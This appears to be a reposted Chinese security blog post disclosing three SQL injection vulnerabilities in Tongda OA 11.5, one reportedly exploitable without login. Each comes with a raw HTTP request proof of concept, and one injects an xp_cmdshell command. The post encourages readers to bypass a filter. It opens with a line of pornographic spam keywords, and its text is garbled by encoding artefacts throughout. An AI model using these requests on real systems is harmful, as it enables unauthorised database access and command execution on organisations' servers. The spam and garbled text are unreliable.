天天操成人电影,色九九九九九九,无码精品视频在线观看,91久久婷婷国产麻豆精品,国产精品激情五月综合,成人三级av,大香蕉一本线,免费大片www

這是繼："全網(wǎng)首發(fā) | 通達OA多枚0day分享"? ?對通達OA 系統(tǒng)更加深入的一次審計，重新審計后又發(fā)現(xiàn)一些問題。

0x01 SQL注入 POC(11.5版本無需登錄):
漏洞參數(shù)：SORT_ID，F(xiàn)ILE_SORT
審計版本：通達OA 11.5

POST /general/file_folder/swfupload_new.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/Connection: closeHost: 192.168.202.1Content-Length: 391Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USContent-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_ID"
1------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_NAME"
1------------GFioQpMK0vv2Content-Disposition: form-data; name="FILE_SORT"
2------------GFioQpMK0vv2Content-Disposition: form-data; name="SORT_ID"
------------GFioQpMK0vv2--

看看下圖，在我去掉cookie之后，發(fā)現(xiàn)一樣能注入，我測試的11.5版本存在未授權(quán)也能注入。

漏洞文件：webroot\general\file_folder\swfupload_new.php 。
先看SORT_ID與FILE_SORT參數(shù)，這兩個參數(shù)都是通過$data[""]; 來接收變量，都直接帶入SQL查詢語句中，沒有做任何過濾，造成注入。

0x02 SQL注入 POC（有過濾）:
漏洞參數(shù)：CONTENT_ID_STR
審計版本：通達OA 11.5

POST /general/file_folder/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&SORT_ID=59X-Resource-Type: xhrCookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701Connection: closeHost: 192.168.202.1Pragma: no-cachex-requested-with: XMLHttpRequestContent-Length: 82x-wvs-id: Acunetix-Deepscan/209Cache-Control: no-cacheaccept: */*origin: http://192.168.202.1Accept-Language: en-UScontent-type: application/x-www-form-urlencoded; charset=UTF-8
CONTENT_ID_STR=222&SORT_ID=59&FILE_SORT=1&action=sign

漏洞文件：webroot\general\file_folder\folder.php。
但是經(jīng)過了td_trim函數(shù)，會過濾掉：空格、制表符、換行符、回車符、垂直制表符等。只能報錯，或嘗試 and 等語句判斷還是沒有問題的。

如果有厲害的師傅會有戲，可以繞繞試試了，先放這里了。

0x03 SQL注入 POC:
漏洞參數(shù)：remark
審計版本：通達OA 11.5

POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=trueX-Resource-Type: xhrCookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701Connection: closeHost: 192.168.202.1Pragma: no-cachex-requested-with: XMLHttpRequestContent-Length: 97x-wvs-id: Acunetix-Deepscan/186Cache-Control: no-cacheaccept: */*origin: http://192.168.202.1Accept-Language: en-UScontent-type: application/x-www-form-urlencoded; charset=UTF-8
m_id=5&join_flag=2&remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--

漏洞文件：webroot\general\appbuilder\modules\meeting\models\MeetingReceipt.php。漏洞存在于$remark=$data['remark']; 與$form->REMARK = $remark; 可以看到remark參數(shù)沒有過濾，直接拼接到insert語句中造成的注入。

END.

歡迎轉(zhuǎn)發(fā)~

歡迎關(guān)注~

歡迎點贊~

續(xù)集 | 再發(fā)通達OA多枚0day